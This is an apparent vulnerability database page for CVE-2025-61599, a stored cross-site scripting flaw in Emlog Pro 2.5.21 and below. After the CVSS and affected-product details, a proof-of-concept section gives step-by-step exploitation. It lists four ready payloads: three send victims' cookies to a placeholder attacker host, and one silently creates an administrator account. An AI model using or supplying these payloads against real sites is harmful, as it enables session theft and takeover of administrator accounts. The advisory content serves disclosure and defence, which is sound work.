Security Vulnerability Report
CVE-2025-61599 CVSS 5.4 MEDIUM

CVE-2025-61599

Published: 2025-10-03 07:15:46
Last Modified: 2025-10-08 15:26:36

Description

Emlog is an open source website building system. A stored Cross-Site Scripting (XSS) vulnerability exists in the "Twitter" feature of EMLOG Pro 2.5.21 and below. An authenticated user with privileges to post a "Twitter" message can inject arbitrary JavaScript code. The malicious script is stored on the server and gets executed in the browser of any user, including administrators, when they click on the malicious post to view it. This issue does not currently have a fix.

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:emlog:emlog:*:*:*:*:pro:*:*:* - VULNERABLE
Emlog Pro <= 2.5.21

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-61599 - Emlog Pro Stored XSS via Twitter Feature -->

<!-- Step 1: Login as an authenticated user with Twitter posting privileges -->
<!-- Step 2: Navigate to the Twitter/Tweet posting page -->
<!-- Step 3: Submit the following payload as tweet content -->

<!-- Payload 1: Basic cookie stealing via img onerror -->
<img src=x onerror="fetch('https://attacker.example.com/steal?cookie='+encodeURIComponent(document.cookie))">

<!-- Payload 2: Using script tag directly -->
<script>
var img = new Image();
img.src = 'https://attacker.example.com/steal?cookie=' + encodeURIComponent(document.cookie);
</script>

<!-- Payload 3: SVG-based XSS payload -->
<svg onload="fetch('https://attacker.example.com/steal?cookie='+encodeURIComponent(document.cookie))">

<!-- Payload 4: Admin privilege escalation - create a new admin account via CSRF -->
<script>
fetch('/admin/user.php?action=add', {
  method: 'POST',
  headers: {'Content-Type': 'application/x-www-form-urlencoded'},
  body: 'username=hacker&password=hacked123&role=admin'
});
</script>

<!-- Step 4: Wait for an administrator or other users to view the malicious tweet -->
<!-- Step 5: The malicious JavaScript executes in the victim's browser context -->

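References

https://github.com/emlog/emlog/security/advisories/GHSA-rm5c-mjpg-vm89 (Exploit, Third Party Advisory)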

Raw JSON Data
